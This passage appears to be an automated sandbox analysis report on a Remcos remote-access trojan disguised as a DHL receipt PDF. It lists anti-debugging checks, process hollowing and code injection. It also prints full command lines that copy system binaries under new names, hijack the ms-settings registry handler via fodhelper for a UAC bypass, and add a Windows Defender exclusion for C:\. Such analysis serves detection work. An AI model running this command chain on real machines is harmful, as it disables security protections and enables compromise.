              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,20_2_0040DD85
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_2DA5A748
              Source: C:\ProgramData\Remcos\remcos.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,5_2_2D5BA748
              Source: C:\Users\Public\xkn.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\Public\Libraries\yfkwifxL.pifWindow / User API: threadDelayed 387Jump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeWindow / User API: threadDelayed 3512Jump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeWindow / User API: threadDelayed 6349Jump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeWindow / User API: foregroundWindowGot 1739Jump to behavior
              Source: C:\Users\Public\xkn.exeWindow / User API: threadDelayed 1934
              Source: C:\Users\Public\alpha.exeAPI coverage: 6.5 %
              Source: C:\Users\Public\alpha.exeAPI coverage: 6.5 %
              Source: C:\Users\Public\alpha.exeAPI coverage: 8.1 %
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BCD740_2_028BCD74
              Source: C:\Users\Public\Libraries\yfkwifxL.pif TID: 7480Thread sleep count: 387 > 30Jump to behavior
              Source: C:\ProgramData\Remcos\remcos.exe TID: 8008Thread sleep time: -1756000s >= -30000sJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exe TID: 8008Thread sleep time: -3174500s >= -30000sJump to behavior
              Source: C:\Users\Public\xkn.exe TID: 7952Thread sleep count: 1934 > 30
              Source: C:\Users\Public\xkn.exe TID: 7956Thread sleep count: 149 > 30
              Source: C:\Users\Public\xkn.exe TID: 8056Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028A58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028A58B4
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA4BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_2DA4BD37
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA4783C FindFirstFileW,FindNextFileW,0_2_2DA4783C
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA4880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_2DA4880C
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA4BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_2DA4BB30
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA59AF5 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_2DA59AF5
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA49665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_2DA49665
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA4C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_2DA4C34D
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA5C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_2DA5C291
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA49253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_2DA49253
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_45BC10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_45BC10F1
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5AC34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_2D5AC34D
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5ABD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_2D5ABD37
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5A9665 FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_2D5A9665
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5A880C FindFirstFileW,FindNextFileW,FindClose,5_2_2D5A880C
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5A783C FindFirstFileW,FindNextFileW,5_2_2D5A783C
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5ABB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_2D5ABB30
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5B9AF5 FindFirstFileW,5_2_2D5B9AF5
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5BC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_2D5BC291
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,7_2_00007FF7689C2978
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,7_2_00007FF7689B35B8
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,7_2_00007FF7689B1560
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,7_2_00007FF7689C823C
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF7689D7B4C
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,8_2_00007FF7689C2978
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,8_2_00007FF7689B35B8
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,8_2_00007FF7689B1560
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,8_2_00007FF7689C823C
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose,8_2_00007FF7689D7B4C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF7689C2978
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF7689C823C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF7689B35B8
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689B1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF7689B1560
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689D7B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF7689D7B4C
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0040AE51 FindFirstFileW,FindNextFileW,20_2_0040AE51
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA47C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_2DA47C97
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_00418981 memset,GetSystemInfo,20_2_00418981
              Source: C:\Users\Public\xkn.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\Public\Libraries\yfkwifxL.pifFile opened: C:\Users\user\AppData\Local\Temp\971D.tmpJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifFile opened: C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.tmpJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifFile opened: C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmpJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifFile opened: C:\Users\user\Jump to behavior
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1767013718.000000002D4A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
              Source: remcos.exe, 00000005.00000003.2495195911.00000000005F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh[b%SystemRoot%\system32\mswsock.dllss~W
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.000000000073E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8|z%SystemRoot%\system32\mswsock.dll
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.000000000061E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000029.00000002.1940219819.000000000075D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1767013718.000000002D4A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\e
              Source: bhvC179.tmp.20.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
              Source: remcos.exe, 00000005.00000003.2495195911.000000000061E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.0000000000625000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWzf
              Source: remcos.exe, 00000029.00000002.1940219819.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: bhvC179.tmp.20.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-84393
              Source: C:\ProgramData\Remcos\remcos.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\Public\xkn.exeProcess information queried: ProcessInformation

              Anti Debugging

              barindex
              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BD920 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_028BD920
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeProcess queried: DebugFlagsJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeProcess queried: DebugPortJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeProcess queried: DebugPortJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeProcess queried: DebugFlagsJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeProcess queried: DebugPort
              Source: C:\ProgramData\Remcos\remcos.exeProcess queried: DebugPort
              Source: C:\ProgramData\Remcos\remcos.exeProcess queried: DebugFlags
              Source: C:\ProgramData\Remcos\remcos.exeProcess queried: DebugPort
              Source: C:\ProgramData\Remcos\remcos.exeProcess queried: DebugPort
              Source: C:\ProgramData\Remcos\remcos.exeProcess queried: DebugFlags
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA749F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_2DA749F9
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF31A29C memset,SearchPathW,CreateFileW,GetFileSize,ReadFile,SetFilePointer,CharNextW,IsCharAlphaNumericW,StrToIntW,IsCharAlphaNumericW,StrToIntW,CharNextW,GetLastError,OutputDebugStringW,CloseHandle,19_2_00007FF6DF31A29C
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,20_2_0040DD85
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B7CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_028B7CC8
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA832B5 mov eax, dword ptr fs:[00000030h]0_2_2DA832B5
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028FF3AD mov eax, dword ptr fs:[00000030h]0_2_028FF3AD
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_45BC4AB4 mov eax, dword ptr fs:[00000030h]5_2_45BC4AB4
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5E32B5 mov eax, dword ptr fs:[00000030h]5_2_2D5E32B5
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA51CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,0_2_2DA51CFE
              Source: C:\Users\Public\xkn.exeProcess token adjusted: Debug
              Source: C:\ProgramData\Remcos\remcos.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA74FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_2DA74FDC
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA749F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_2DA749F9
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA7BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_2DA7BB22
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA74B47 SetUnhandledExceptionFilter,0_2_2DA74B47
              Source: C:\Users\Public\Libraries\yfkwifxL.pifCode function: 1_2_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,1_2_004098D0
              Source: C:\Users\Public\Libraries\yfkwifxL.pifCode function: 1_2_004098F0 SetUnhandledExceptionFilter,1_2_004098F0
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_45BC60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_45BC60E2
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_45BC2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_45BC2B1C
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_45BC2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_45BC2639
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5D4FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_2D5D4FDC
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5D49F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_2D5D49F9
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5D49F8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_2D5D49F8
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5D4B47 SetUnhandledExceptionFilter,5_2_2D5D4B47
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5DBB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_2D5DBB22
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF7689C8FA4
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689C93B0 SetUnhandledExceptionFilter,7_2_00007FF7689C93B0
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF7689C8FA4
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7689C93B0 SetUnhandledExceptionFilter,8_2_00007FF7689C93B0
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF7689C8FA4
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7689C93B0 SetUnhandledExceptionFilter,11_2_00007FF7689C93B0
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF31ED50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF6DF31ED50
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF31F050 SetUnhandledExceptionFilter,19_2_00007FF6DF31F050
              Source: C:\Users\Public\xkn.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeMemory allocated: C:\Users\Public\Libraries\yfkwifxL.pif base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeMemory allocated: C:\Users\Public\Libraries\yfkwifxL.pif base: 24020000 protect: page execute and read and writeJump to behavior
              Contains functionality to inject code into remote processes
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5B80EF CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,5_2_2D5B80EF
              Drops or copies cmd.exe with a different name (likely to bypass HIPS)
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
              Maps a DLL or memory area into another process
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and writeJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and writeJump to behavior
              Sample uses process hollowing technique
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection unmapped: C:\Users\Public\Libraries\yfkwifxL.pif base address: 400000Jump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeMemory written: C:\Users\Public\Libraries\yfkwifxL.pif base: 256008Jump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe0_2_2DA520F7
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA59627 mouse_event,0_2_2DA59627
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeProcess created: C:\Users\Public\Libraries\yfkwifxL.pif C:\Users\Public\Libraries\yfkwifxL.pifJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe" Jump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32" Jump to behavior
